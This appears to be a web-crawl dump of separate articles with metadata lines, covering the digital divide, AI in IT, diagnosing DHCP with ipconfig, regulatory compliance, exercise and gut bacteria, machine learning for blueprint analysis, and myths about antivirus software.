The technology gap, often referred to as the digital divide, is a multifaceted concept encompassing disparities related to technology access, digital skills, and the ability to harness the benefits of technological advancements. It represents a chasm between those who have ready access to technology and the digital world and those who do not, creating a gulf that can perpetuate socio-economic inequalities.
At its core, the technology gap comprises:
1. Access Disparities: The most fundamental aspect of the technology gap is unequal access to technology and the internet. This includes disparities in physical access to devices like computers and smartphones as well as variations in the availability of high-speed internet connections.
2. Digital Literacy: Technology proficiency is another dimension of the gap, reflecting differences in digital literacy and the ability to navigate digital platforms, use software, and engage in online communication effectively.
3. Socioeconomic Factors: Socioeconomic status often plays a pivotal role in the technology gap. Individuals with limited financial resources may struggle to acquire the necessary devices or access the internet, further exacerbating the divide.
4. Educational Disparities: The technology gap is often intertwined with educational disparities. Students with limited access to technology may face obstacles in remote learning, research, and digital skill development.
5. Rural-Urban Disparities: Geographic location can also contribute to the technology gap, as rural areas may have less access to high-speed internet infrastructure and technology resources compared to urban centers.
Implications of the Technology Gap
The consequences of the technology gap are far-reaching and touch various aspects of modern life:
1. Economic Disparities: Those on the wrong side of the technology gap may face limited employment opportunities, reduced earning potential, and barriers to participating in the digital economy.
2. Educational Inequities: The technology gap can hinder educational outcomes, as students lacking access to technology and the internet may struggle to keep up with online learning platforms and digital research tools.
3. Social Isolation: Individuals with limited digital access may experience social isolation, especially in an era where social interactions often occur online.
4. Healthcare Disparities: Access to telehealth services and digital health resources can be compromised for those on the wrong side of the technology gap, impacting their healthcare options.
5. Civic Participation: Engagement in civic life, including access to government services and participation in democratic processes, can be limited for those without digital access.
Bridging the Gap
Efforts to bridge the technology gap are crucial for fostering a more inclusive and equitable society. Solutions may include:
1. Infrastructure Investment: Expanding broadband internet access to underserved areas can reduce disparities in connectivity.
2. Digital Literacy Programs: Initiatives that offer digital skills training can empower individuals to navigate the digital landscape effectively.
3. Device Accessibility: Subsidized or low-cost devices can increase access to technology for those with limited financial means.
4. Education Reforms: Schools can play a role in addressing the technology gap by ensuring that all students have access to necessary technology resources for learning.
A Call for Inclusivity
The Define Technology Gap is not merely a digital divide; it is a reflection of societal disparities in access, skills, and opportunities. To build a more inclusive and equitable future, concerted efforts are required to bridge this gap, ensuring that everyone has the chance to benefit from the vast opportunities and knowledge the digital age has to offer. It is only through collective action that we can pave the way to a more technologically inclusive world. | <urn:uuid:91561bfd-f240-4e6e-8282-51bdcb3bb33a> | CC-MAIN-2024-38 | https://generaltonytoy.com/define-technology-gap-bridging-the-chasm-understanding/ | 2024-09-13T02:12:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00087.warc.gz | en | 0.924706 | 794 | 4.15625 | 4 |
Artificial Intelligence or AI has become one of the most used words by businesses to highlight the technology prowess of various products and solutions, for the time being. The world is peacefully moving toward automation– from autonomous robots to computer systems that can almost immediately sift through thousands of papers, thus saving time and money for companies in newer ways. The system can now be used for activities that are important but repetitive and time consuming, which would take people much longer and be more vulnerable to error.
AI focuses on creating intelligent systems that are capable of learning, reasoning, adapting, and performing tasks similar to humans. To obtain the best results, the information technology systems perform acts of capturing, storing, analyzing, and evaluating data. AI systems are more inclined toward developing knowledge and facts, thus making the AI system more intelligent than the information systems.
Artificial intelligence reshaping IT
Following measures show how AI is proving useful to reshape IT and ultimately help IT leaders build a stronger foundation:
1. “IT” – major AI consumer
Wayne Butterfield, Director of Cognitive Automation and Innovation at Intelligent Services Gateway (ISG), is of the view, “An IT Service Desk is as prone to repetition (and therefore automation) as a customer service operation.” The methods used to automate conventional break-fix processes and other IT service desk processes are not new, but these days they are gaining considerable traction.
2. Shadow IT could expand
Sometimes, as a result of AI, IT activities taking place outside the tech core are rapidly increasing. According to ISG’s Butterfield, the power of perceived shadow IT functions is expanding in the enterprises, may that be about data science and analytics tools or robotic process automation (RPA) that function across an enterprise till machine learning models. Of course, the culture depends on the concept of and the distinction between “self-service” and “shadow IT.”
3. Data science to deeply connect with IT
Some traditional business applications, such as CRM (customer relationship management), are utilizing more of AI and automation. To work with advanced forms of AI, a strong bond between IT and data science is becoming visible. Shawn Rogers, Vice President, Corporate Market at TIBCO, commented, “The early days of having a data scientist tucked away in the organization are over. Today, data science takes a village, and IT is part of that team.”
Every organization is preparing to scale AI and analytics’ usage, as they need more profound access to the data, system applications that IT wants. Client partner for technology services at Fractal Analytics, George Mathew, says, “Building AI-led solutions requires intense collaboration between the data scientists and engineers.” He continues telling, “While each of these is a deep area by itself, successful teams have enabled these two groups to work together, and in many cases overlap across areas, in order to production AI solutions.”
4. IT and data science to share tools and tactics
The relationship between IT and data science needs to follow some part of the technologies and techniques of each other, as George Mathew says, “at least for the sake of familiarity, if not for expertise.”
How AI impacts IT
IT and AI are growing at a speed of light. AI technologies are revolutionizing old ideas that will help to improvise the IT system to perform optimized operations. For IT functionalities to grow, AI acts as a stepping stone that IT industries need to transform their systems into intelligent ones. Automation and optimization are critical factors of AI in IT. Following listing reflects on applications of AI in information technology:
1. Data security
Securing any system is essential in information technology. The reason being, confidential information of private and public organizations as well as governments is stored in the systems, which needs to be secured. For an information network, designing and maintaining a stable infrastructure is a high priority. And the AI system can meet these challenges by developing an intelligent system that identifies threats and data breaches, as well as providing precautions and solutions to security-related issues at the earliest opportunity.
2. Building better information systems
The foundation for developing any program is to run a valid, bug-free code. AI systems are built to improve overall productivity. An AI framework uses a set of algorithms that can help programmers write better code or solve bugs in the code.
3. Process automation
An AI system that is integrated with deep learning networks aims to automate the process of the backend to reduce time and cost. An AI-programmed algorithm slowly learns from its errors when executing tasks and automatically optimizes the code to work better.
The digital transformation and industry’s revolutionary adoption of technology has given rise to new technological advances to optimize and solve the industry’s core challenges. Among all the technology applications, AI is at the heart of every industry’s deployment, and information technology is at the forefront of the list. Integrating AI systems in IT helped reduce the burden on developers and improve efficiency, quality assurance, and productivity. And on a large scale, the development and deployment of IT systems that were impossible earlier today are made possible by the advanced algorithmic functions of AI. Find more such content and information in our latest whitepapers on AI. | <urn:uuid:ef6b7f59-f6ec-4e37-8719-9cb18bea427f> | CC-MAIN-2024-38 | https://www.ai-demand.com/insights/tech/artificial-intelligence/changing-role-of-artificial-intelligence-in-information-technology/ | 2024-09-13T02:40:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00087.warc.gz | en | 0.947369 | 1,088 | 2.546875 | 3 |
When it comes to troubleshooting network problems, many people are intimidated by the complexity of TCP/IP. Although TCP/IP is much more complex than other protocols, it tends to be easier to troubleshoot because it contains several tools designed to help you locate and solve a wide variety of problems. (Many network administrators wish that protocols such as IPX/SPX and Net BEUI had TCP/IP’s troubleshooting tools.) One such tool is the ipconfig program.
To use ipconfig, simply open a Command Prompt window and enter “ipconfig”. When you do, Windows NT will display a summary of each network adapter installed in your system, along with its TCP/IP configuration.
The ipconfig command is especially useful for diagnosing DHCP problems. If you’re using a DHCP server, you can use ipconfig to see the address that DHCP has assigned to the adapter. If you’re using a DHCP server, but you see the IP address 0.0.0.0, your computer has either lost communication with the DHCP server or the DHCP server is malfunctioning.
If you’re using static IP addresses, you can use ipconfig to see the TCP/IP configuration as the Windows server sees it. The information displayed isn’t simply a regurgitation of what’s inserted into the TCP/IP properties sheet–rather, it’s a way to tell if Windows has accepted the address that you’ve used.
By default, ipconfig lists the IP address, subnet mask, and default gateway of each network adapter. If you require more detailed information, you can use the /all switch after the ipconfig command. Doing so will cause the ipconfig program to display more detailed information, such as the MAC address of each network card, and an indication of whether the address was provided by a DHCP server.
"Although TCP/IP is much more complex than other protocols, it tends to be easier to troubleshoot because of the powerful troubleshooting tools it contains. " |
Fibre Channel, an emerging technology, consists of a technology converted from SCSI to optical to a very specialized packet. Fibre Channel does two things: It runs the SCSI protocol at 100MB per port over optical cables, and it runs a unique storage protocol at 1.06Gbps in packets. (Fibre Channel does not currently run IP.) It’s really SCSI using a different protocol. As a network topology, Fibre Channel uses a hub or a switch as a concentrator. The switch runs faster than the hub. Fibre Channel supports up to 500 meters, which is suitable for most applications. (You can spend more money and purchase special cables and drivers to go up to 10 kilometers.)
Current Fibre Channel Arbitrated Loop (FC-AL) has one downside: it runs Class 3 service. Three classes exist for quality of service of transmission, and Class 3 service doesn’t guarantee or acknowledge transmission. If a fibre drops a packet and the software fails to catch it, the result is a hang up (or a time out), causing the system to momentarily freeze. The reinitialization loop process begins, resetting the entire bus.
Use winipcfg in Windows 98
Unfortunately, the ipconfig command only works in Windows NT. If you have computers on your network running Windows 98, you’ll have to use a different command. To do so, enter “winipcfg” at the Run prompt. Doing so will display a dialog box that displays the computer’s TCP/IP configuration, as seen by Windows. Click the More Info button to get additional information, such as the WINS and DNS configuration.
You can select the network adapter on which you’re viewing information by choosing the adapter from a drop-down list. If you need to release or renew a lease, you can do so by selecting the adapter from the drop-down list and clicking the Release or Renew button. Likewise, you can release or renew the lease for all installed adapters by clicking Release All or Renew All. //
Brien M. Posey is an MCSE who works as a freelance writer and as the director of information systems for a national chain of health care facilities. His past experience includes working as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it’s impossible for him to respond to every message, although he does read them all. | <urn:uuid:453c4a63-a4b5-4121-a865-c2b76b667849> | CC-MAIN-2024-38 | https://www.enterprisenetworkingplanet.com/management/diagnose-dhcp-problems-with-ipconfig/ | 2024-09-13T02:15:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00087.warc.gz | en | 0.905878 | 932 | 2.875 | 3 |
Understanding regulatory compliance: Types, challenges and best practices
Regulatory compliance is a cornerstone of good governance and risk management, yet navigating the complex landscape of regulations can be a daunting task for compliance professionals, board members and executive leaders alike.
Here, we'll explore the basics of regulatory compliance, addressing common questions and offering insights into effective practices.
What is regulatory compliance?
Regulatory compliance refers to an organization's adherence to the laws, regulations and standards established by government agencies, industry bodies or other external entities. These regulations can encompass various aspects of an organization's operations, including:
- Financial reporting and auditing
- Data privacy and security
- Product safety and quality
- Environmental protection
- Anti-bribery and corruption
- Labor laws and employment practices
The specific regulations applicable to an organization depend on its industry, size, location, and activities. Understanding and complying with these regulations is crucial for several reasons:
- Avoiding legal and financial penalties: Non-compliance can lead to significant fines, reputational damage and even criminal charges.
- Protecting stakeholders: Compliance safeguards the interests of customers, employees, investors and the broader community.
- Building trust and reputation: A commitment to compliance fosters trust and enhances an organization's reputation as a responsible and ethical entity.
- Gaining a competitive edge: By proactively complying with regulations, organizations can avoid disruptions and establish themselves as reliable and trustworthy partners.
What are the common challenges in achieving regulatory compliance?
Maintaining compliance can be challenging due to several factors:
- Complexity and dynamism: The regulatory landscape is constantly evolving, as new regulations are introduced and existing are amended. Keeping up with these changes requires continuous monitoring and adaptation.
- Resource limitations: Implementing and maintaining a robust compliance program can be resource-intensive, especially for smaller organizations.
- Lack of awareness and understanding: Employees may not be fully aware of their compliance obligations, leading to inadvertent breaches.
- Siloed information and processes: A lack of centralized visibility over compliance activities can hinder effective management and oversight.
How can organizations build an effective compliance program?
To overcome these challenges and achieve sustained compliance, organizations can adopt the following strategies:
- Establish a clear compliance culture: Foster a culture built on ethics and integrity, where compliance is viewed as a shared responsibility, not just a compliance department concern.
- Conduct comprehensive risk assessments: Regularly identify, assess and prioritize compliance risks specific to your organization.
- Develop and implement a compliance program: Create a documented program outlining policies, procedures, and controls to address identified compliance risks.
- Invest in training and awareness: Train employees at all levels on their compliance obligations and equip them with the knowledge and skills necessary to comply with relevant regulations.
- Maintain clear communication: Communicate compliance expectations and responsibilities clearly to all employees through various channels.
- Implement monitoring and reporting mechanisms: Establish ongoing monitoring processes to identify and address potential compliance gaps and report relevant information to management and the board.
- Leverage technology: Utilize technology to streamline compliance processes, automate tasks, and improve data management and reporting capabilities.
What is the role of the board of directors in ensuring regulatory compliance?
The board of directors plays a critical role in overseeing the organization's compliance efforts. This includes:
- Approving the compliance program: Setting the overall tone and direction for the compliance program and providing necessary resources.
- Overseeing management's implementation: Holding management accountable for implementing and maintaining an effective compliance program.
- Providing guidance and support: Providing guidance and support to management on compliance matters and ensuring appropriate communication with the board.
- Receiving regular reports: Receiving regular reports on the organization's compliance performance and any identified risks or issues.
How can compliance and governance professionals stay updated on regulatory changes?
Staying informed about regulatory changes is essential for board members and executive leaders. Here are some ways to achieve this:
- Subscribe to industry publications and regulatory body updates: Stay up-to-date on industry trends and regulatory changes by subscribing to relevant publications and newsletters from regulatory agencies.
- Attend industry conferences and workshops: Participate in industry conferences and workshops to learn about new compliance challenges and best practices.
- Utilize professional networks and resources: Leverage professional networks and industry associations to share information and resources with other compliance professionals.
- Seek external expertise: When faced with complex regulations or legal issues, consider engaging experienced external consultants or legal counsel.
By adopting a proactive and comprehensive approach to regulatory compliance, organizations can navigate the ever-evolving regulatory landscape effectively.
This not only mitigates risks and protects the organization from potential liabilities but also fosters trust, enhances reputation and promotes sustainable business growth. | <urn:uuid:d558f822-d1e3-4fb4-9b93-0f11ceb6a69e> | CC-MAIN-2024-38 | https://www.diligent.com/resources/blog/understanding-regulatory-compliance | 2024-09-15T09:15:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00787.warc.gz | en | 0.923695 | 971 | 2.671875 | 3 |
Bacteria, often synonymous with infection and disease, may have an unfair reputation.
Research indicates there are as many, if not more, bacterial cells in our bodies as human cells, meaning they play an important role in our physiology.
In fact, a growing body of evidence shows that greater gut microbiota diversity (the number of different species and evenness of these species’ populations) is related to better health.
Now, research published in Experimental Physiology has suggested that the efficiency with which we transport oxygen to our tissues (cardiorespiratory fitness) is a far greater predictor of gut microbiota diversity than either body fat percentage or general physical activity.
The findings suggest that exercise at a sufficiently high intensity, to improve cardiorespiratory fitness, may support health through favourable alterations in the presence, activity and clustering of gut microbes.
Such exercise-induced improvements, in cardiorespiratory fitness, often correspond with central (e.g. increased volume of blood pumped by the heart each beat) and peripheral adaptations (e.g. increased number of capillaries to transport oxygen from blood to muscles).
Before now, it was understood that higher cardiorespiratory fitness tended to coincide with greater gut microbiota diversity, but it was unclear whether this relationship was attributable to body fat percentage or physical activities of daily-living.
Since cancer treatment is known to trigger physiological changes detrimental to cardio-metabolic health, including increased body fat percentage and declining cardiorespiratory fitness, this research was performed on cancer survivors.
In total, 37 non-metastatic breast cancer survivors, who had completed treatment at least one year prior, were enrolled.
Participants performed a graded exercise test to estimate peak cardiorespiratory fitness, assessments of total energy expenditure and examination of gut microbiota from faecal swipes.
The results showed that participants with the higher cardiorespiratory fitness had significantly greater gut microbiota diversity compared to less fit participants.
Further statistical analyses highlighted that cardiorespiratory fitness accounted for roughly a quarter of the variance in species richness and evenness, independent of body fat percent.
These data offer intriguing insight into the relationship between cardiorespiratory fitness and gut microbiota diversity.
However, given the cross-sectional nature of the study design, the research team’s findings are correlative in nature.
The participant sample was restricted to women with a history of breast cancer, who tended to exhibit low cardiorespiratory fitness and other health problems, meaning generalisation to other groups should be made with caution.
Stephen Carter, lead author of the paper from Indiana University, is enthusiastic about continuing his team’s research:
“Our group is actively pursuing an interventional study to determine how variation in exercise intensity can influence gut microbiota diversity under controlled-feeding conditions to uncover how exercise may affect functional outcomes of gut microbiota, as well as, studying how exercise prescription may be optimized to enhance health outcomes among clinical populations.”
More information: Stephen J. Carter et al, Gut microbiota diversity associates with cardiorespiratory fitness in post-primary treatment breast cancer survivors, Experimental Physiology (2019). DOI: 10.1113/EP087404
Ron Sender et al. Are We Really Vastly Outnumbered? Revisiting the Ratio of Bacterial to Host Cells in Humans, Cell (2016). DOI: 10.1016/j.cell.2016.01.013
Provided by The Physiological Society | <urn:uuid:2b9111a6-e01e-44ed-b8a9-07ac0a993373> | CC-MAIN-2024-38 | https://debuglies.com/2019/02/15/exercise-improve-health-by-increasing-gut-bacterial-diversity/ | 2024-09-16T15:45:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00687.warc.gz | en | 0.935179 | 717 | 3.15625 | 3 |
Artificial intelligence was once a phenomenon restricted to sci-fi movies, but technology has finally caught up with imagination. Now AI has become reality and amazingly, most people encounter some form of artificial intelligence in their everyday lives.
For example, AI has dramatically improved the technology in our homes. Amazon’s Alexa can carry out a number of functions via voice interactions, such as playing music, answering factual questions and even making online purchases. And now, with the recent launch of AmazonGo, AI allows shoppers to simply walk out of a shop with their purchases and automatically get charged, sending an invoice directly to their phone.
To truly understand AI, we must first absorb its definition. According to Gartner there are three key requirements that define AI:
1. It needs to be able to adapt its behaviour based on experience.
2. It can’t be totally dependent on instructions from people and thus, needs to be able to learn on its own.
3. It needs to be able to come up with unanticipated results.
If you are following these requirements the AI that we interact with on a daily basis, such as Amazon’s Alexa and Apple’s Siri, are defined as ‘weak AI’. This means that they were created by a number of algorithms that have been built to accomplish specific tasks. ‘Strong AI’ and ‘General AI’, that can replicate or even exceed human intelligence, may be the final aim for scientists but have not yet been successfully developed. This type of AI is still confined to existence on the movie screen – for now.
But Weak (or Narrow) AI is still very powerful today. Not only is this AI impacting our homes, but much of the excitement surrounding its development stems from its potential to revolutionise the workplace. Another Gartner report also states that “employing AI offers enterprises the opportunity to give customers an improved experience at every point of interaction, but without human governance, the opportunity will be squandered.” So as AI is implemented into the corporate environment, it will need “human governance” in order to be successful. This responsibility will most likely fall into the hands of corporate IT Service Management (ITSM) teams.
AI’s role in the revolution of ITSM
However, in turn AI also has the potential to transform ITSM into a more user friendly and efficient system. The adoption of AI should in theory allow members of IT to delegate their more mundane daily tasks to AI software and free up their time to pursue more strategic activities. Rather than operating in the background, IT staff would be able to re-position themselves as key business enablers.
We are already seeing AI technology being used in chatbot software, helping to move the task of dealing with customer inquiries and issues away from IT staff. This utilises conversational user interfaces, natural language recognition and learning/pattern recognition.
These conversation-based pattern and intent-learning technologies open the door for AI to be able to converse, learn and interpret an individual’s feelings, thus allowing for a more complex understanding of human behaviour. A learning, conversational AI experience will be critical for AI technology to succeed, and will revolutionise ITSM in a number of different ways.
An AI-automated front line
At the moment, automated ITSM processes only work if all information provided is accurate, and mistakes can easily occur if a customer accidentally provides incorrect information. This can be as simple as customer clicking on the wrong link or wrongly ticking a box on an online form, perhaps making a request when they actually need troubleshooting help.
Consequently, customer experience can be poor as requests and incidents are either delayed or lost. This risk and uncertainty in old-style self-service ‘portals’ still means that most companies are understandably reluctant to divert their human ITSM front line resources away from handling phone conversations.
Adding AI technology to conversational chatbots enables the development of automated ITSM solutions that have the capability to interpret, diagnose and even assist on incidents and requests accurately without human intervention. As the technology develops, we will see it improve and personalise the end-user experience.
Good ITSM operates many ‘back-end’ processes and activities that may not be visible to an end user, yet ensure that vital IT systems remain operational, efficient and also help to improve the business.
Many proactive, corrective or fulfilment activities across incident management, request management and into event management, release management and change management can be made more efficient when an AI-enabled ITSM solution is integrated with other systems on the network. For example, ITSM AI can detect and automatically open a request or create or update an incident without human intervention.
For example, if AI-enabled ITSM was connected to IoT devices it would be notified instantly if a smart device was malfunctioning, without the end-user having to report it. Imagine how efficient this would make IT – the business would be well aware of its important place as a business enabler.
All knowing AI
Furthermore, applying ITSM principles and decision making to the large volume of data from multiple IT systems within an organisation, introduces the ability to see much larger patterns, resulting in incredibly high operational efficiency. This would enable ITSM tools to lead with real-time insights and predictions about how a problem could progress, and give recommendations on how to fix it.
An ITSM solution powered by AI can even go one step further. If knowledge databases did not have answers to end user queries, technology would have the ability to search for answers on trusted websites.
It would also be able to solve problems based on data gathered from more than one single organisation, and would be able to learn new knowledge from offering solutions to users’ questions and needs.
Ultimately although AI will improve over the next few years or even decades, humans remain vital for delivering good IT services. But an AI-enhanced ITSM system is not too far out of our reach – AI is evolving at a rapid pace and has the potential to work alongside humans to create a more efficient working environment. The introduction of AI technology into ITSM principles and toolsets will allow IT staff to become business enablers and productivity transformers, while technology does the heavy lifting.
Sourced by Ian Aitchison, senior product director, ITSM at Ivanti | <urn:uuid:de9d38c1-c982-4a40-961c-af40309af2a5> | CC-MAIN-2024-38 | https://www.information-age.com/rise-artificial-intelligence-9832/ | 2024-09-16T16:37:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00687.warc.gz | en | 0.957766 | 1,311 | 2.90625 | 3 |
Blueprint analysis is a cornerstone in architecture and engineering and bridges conceptual ideas and concrete realities. The blueprints are guides to technical details, spatial relationships, and material specifications crucial for construction. An accurate analysis of these drawings ensures that the final structure is in alignment with the architect’s desires and compliant with regulatory standards while maintaining structural integrity. This process of examination and interpretation lays the foundation for successful architectural endeavors.
In an era of rapid technological advancements, the integration of machine learning into various industries has sparked transformations like never before. In architecture, technology has revolutionized the field of blueprint analysis, which was traditionally a time-consuming and labor-intensive process, by significantly enhancing the efficiency and accuracy of the process.
Basics of Machine Learning in Analysis
Machine learning (ML), a subset of artificial intelligence (AI), has emerged as a game-changer in blueprint analysis. ML focuses on developing algorithms and models capable of learning and making predictions based on data, enabling them to recognize patterns, identify anomalies, and make predictions. The iterative learning process helps models to continuously refine and improve as they are exposed to more data, allowing them to enhance their performance and accuracy over time. In blueprint analysis, machine learning models can be trained on vast datasets of diverse blueprints to develop a keen understanding of design principles, regulations, and common errors.
Challenges in Traditional Blueprint Analysis
The field of blueprint analysis involves a complex understanding of intricate design documents. Traditionally, this crucial task was undertaken by human experts who meticulously examined the blueprints for errors, inconsistencies, and compliance with regulations. This was often a labor-intensive and time-consuming process, leading to delays and increased project costs. While effective, the approach was also prone to human error, resource-intensive, and limited the speed of project development.
The Role of Cutting-Edge Machine Learning
Cutting-edge machine learning in blueprint analysis significantly reduces the time required for analysis. Algorithms can swiftly process vast amounts of data, automating repetitive tasks and accelerating the overall analysis process. ML models trained on diverse datasets can easily spot discrepancies, such as structural weaknesses, code violations, or design inconsistencies. This increases the accuracy of blueprint analysis, reducing the risk of errors. The iterative learning process of ML contributes to a dynamic and ever-improving blueprint analysis system.
Benefits of Revolutionizing Blueprint Analysis
Revolutionizing blueprint analysis with cutting-edge machine learning can have significant transformative gains including efficiency and accuracy, and expediting project development. Automating routine tasks can help professionals direct their efforts toward more complex aspects of their work. ML’s pattern-recognizing abilities open means to improved precision in blueprint analysis and provide valuable insights for project stakeholders.
As technologies evolve, the fusion of human expertise and cutting-edge ML capabilities promises to redefine design, construction, and the analysis of complex structures. The journey toward a future where Machine Learning is integral to blueprint analysis promises a more streamlined, error-free, and innovative approach to project development in the architectural and engineering landscape.
iTech has developed machine learning algorithms for architectural and engineering drawings. Please reach out if you have any questions about how machine learning can help your projects. | <urn:uuid:3ae8f1ae-170d-4b18-ad09-11949fbf8353> | CC-MAIN-2024-38 | https://itechdata.ai/revolutionizing-blueprint-analysis-with-cutting-edge-machine-learning/ | 2024-09-19T03:48:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00487.warc.gz | en | 0.930908 | 645 | 2.90625 | 3 |
Antivirus software – it’s your digital armor, but how much do you really know about it?
From casual internet users to tech enthusiasts, many of us harbor misconceptions about these essential security tools. You might believe free antivirus is just as effective as paid versions or that Macs don’t need protection at all. Perhaps you’ve avoided installing antivirus software for fear that it will grind your computer to a halt.
It’s time to separate fact from fiction. In this post, we’re tackling five widespread myths about antivirus software head-on. We’ll provide you with the hard facts and evidence-backed truths to help you make informed decisions about your digital security.
Whether you’re looking to strengthen your online defenses or simply curious about the real capabilities of antivirus software, you’re in the right place. Let’s cut through the misinformation and get to the heart of what antivirus can (and can’t) do for you.
Ready to test your antivirus knowledge and boost your cybersecurity savvy? Let’s dive in and debunk these myths one by one.
Myth 1: Antivirus software significantly slows down your device
Truth: While it’s true that antivirus software utilizes system resources, modern solutions are engineered to have a minimal impact on your device’s performance. Gone are the days when running a virus scan meant your computer would grind to a halt.
Quality antivirus programs now employ advanced optimization techniques to conduct regular scans without compromising your device’s efficiency. These improvements mean you can work, browse, or play while your antivirus keeps you protected in the background.
To ensure optimal performance:
- Install a single, high-quality antivirus program that meets your device’s system requirements. Multiple antivirus programs can conflict and actually decrease performance.
- Schedule scans during off-peak hours, such as overnight, to avoid interference with your work or leisure activities.
- Opt for antivirus solutions that offer a ‘gaming mode’ or ‘silent mode’ if you’re a gamer or frequently use resource-intensive applications.
Myth 2: Antivirus software only protects against a few viruses
Truth: Modern antivirus software provides comprehensive protection against many malicious programs, not just a handful of viruses. These solutions employ sophisticated detection methods to guard against known threats and identify new, emerging dangers.
Antivirus software typically uses two primary methods of detection:
- Signature-based detection: This method identifies known threats based on a continuously updated database of malware signatures. It’s like having a vast library of “mugshots” for digital criminals.
- Behavior-based detection: Using advanced techniques like machine learning, data science, and artificial intelligence, this method analyzes program behavior to identify new and evolving threats. It can spot malware that hasn’t been seen before based on how it acts.
Myth 3: Apple products can’t get viruses
Truth: While Apple products were historically less targeted by cybercriminals, they are far from immune to malware. As Apple’s market share grows, so does its attractiveness as a target for malicious actors.
In fact, one of the first viruses ever released in the wild, Elk Cloner, was written for Apple II systems back in 1982. Fast forward to today, and we’re seeing an increasing number of sophisticated malware designed specifically for macOS and iOS.
Some notable examples include:
- XcodeGhost: A malware that infected iOS apps through a compromised version of Apple’s Xcode development tool.
- Silver Sparrow: A mysterious malware capable of running natively on M1 Macs.
- ThiefQuest: A hybrid malware that combines ransomware and data exfiltration capabilities.
The takeaway? Whether you’re a Mac or PC user, robust antivirus protection is essential.
Myth 4: You are 100% protected if you have antivirus software
Truth: While antivirus software is a crucial component of your digital security arsenal, it’s not an impenetrable shield against all cyber threats. Think of it as a vital piece of armor, but not the entire suit.
To truly fortify your digital defenses:
- Practice safe browsing habits: Avoid clicking on suspicious links or downloading attachments from unknown sources.
- Steer clear of downloading suspicious content: If it seems too good to be true, it probably is.
- Use a password manager: Create strong, unique passwords for each of your accounts.
- Keep your software and operating system updated: These updates often include critical security patches.
- Enable two-factor authentication where possible: This adds an extra layer of security to your accounts.
Remember, cybersecurity is a holistic practice. Antivirus software is your trusty sidekick, but you’re the superhero in charge of your digital safety.
Myth 5: Antivirus is only necessary for less-experienced users
Truth: Even the most tech-savvy among us can fall victim to malware. Cybercriminals are constantly evolving their tactics, and no one is immune to threats like zero-day vulnerabilities or compromised legitimate websites.
Consider these scenarios:
- A seasoned developer unknowingly downloads a compromised development tool, introducing malware into their system.
- An IT professional falls for a sophisticated phishing email that appears to be from their company’s CEO.
- A cybersecurity expert visits a legitimate website that has been temporarily hijacked to serve malware.
Antivirus software provides an essential layer of protection for all users, regardless of their technical expertise. It’s like wearing a seatbelt – even the most experienced drivers use them because accidents can happen to anyone.
Myth 6: Manual scans are necessary to run antivirus software
Truth: While manual scans were once a crucial part of maintaining your digital hygiene, modern antivirus software has made them largely obsolete for day-to-day use.
Today’s antivirus solutions perform automatic background scans, diligently checking files during downloads and when launching applications. This real-time protection means your system is continuously monitored for threats without you having to lift a finger.
Manual scans are now typically only required in specific situations:
- If you suspect your system might be infected
- After recovering from a malware infection
- When you connect an external drive that hasn’t been scanned recently
Think of it like your immune system – it’s always working in the background, and you only need to take extra measures when you suspect something’s wrong.
Myth 7: Antivirus companies create malware to sell their products
Truth: This conspiracy theory, while persistent, has no credible evidence to support it. Reputable antivirus companies are dedicated to protecting users from genuine threats created by cybercriminals.
Creating malware to drive sales would be not only unethical but also illegal and potentially devastating for a company’s reputation if discovered. The cybersecurity industry operates on trust, and any breach of that trust would likely result in irreparable damage to a company’s business.
Moreover, there’s simply no need for antivirus companies to create threats. Cybercriminals are unfortunately all too real and prolific, providing more than enough work for security researchers and antivirus developers.
Tips for choosing and using antivirus effectively
- Select a reputable solution: Choose an antivirus from a well-known, trusted company with a track record of reliability and regular updates. Check out our article listing the best antivirus providers for some quality options.
- Ensure compatibility: Verify the software is compatible with your operating system and meets your device specifications.
- Keep it updated: Regularly update your antivirus software to protect against the latest threats. Enable automatic updates if available.
- Enable real-time scanning: This provides continuous protection as you use your device.
- Schedule regular full system scans: Set these to run during off-peak hours to minimize disruption.
- Be wary of scare tactics: Be cautious of pop-ups or emails claiming your computer is infected – these may be scams themselves.
- Layer your defenses: Use antivirus in conjunction with other security measures like firewalls, ad-blockers, and regular software updates.
- Educate yourself: Stay informed about the latest cybersecurity threats and best practices. Knowledge is power in the fight against cybercrime.
Common Antivirus FAQs
Do I need antivirus software if I have a firewall?
Yes, you should use both. Firewalls and antivirus software serve different purposes and work together to protect your system. A firewall acts as a barrier, controlling incoming and outgoing network traffic, while antivirus software detects and removes malware that may have already entered your system. Using both provides a more comprehensive security solution.
Can antivirus software protect against ransomware?
Many modern antivirus solutions include specific anti-ransomware features. These typically work by monitoring for suspicious file encryption activities and blocking unknown programs from accessing certain directories. However, it’s important to note that no solution is 100% effective against all ransomware. Regular backups are crucial for protecting your data against ransomware attacks.
See also: Antivirus FAQ | <urn:uuid:8a1b3ba6-bfca-4ec3-81b6-7f487f11f273> | CC-MAIN-2024-38 | https://www.comparitech.com/antivirus/common-myths-about-antivirus-software-debunked/ | 2024-09-19T05:26:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00487.warc.gz | en | 0.91427 | 1,902 | 2.578125 | 3 |
Big data in business. What does it look like?
Table of Contents
ToggleDespite the fact that only 26% of companies say they have achieved a data-driven culture, the big data industry continues to grow, with around 218 (2,000,000,000,000,000,000) bytes of data generated each day across all industries, and some estimates placing its value at $77 billion by 2023.
But who is using big data in the business arena, and what type of work is involved? That’s what we’ll be looking at in this article.
Big Data Concepts
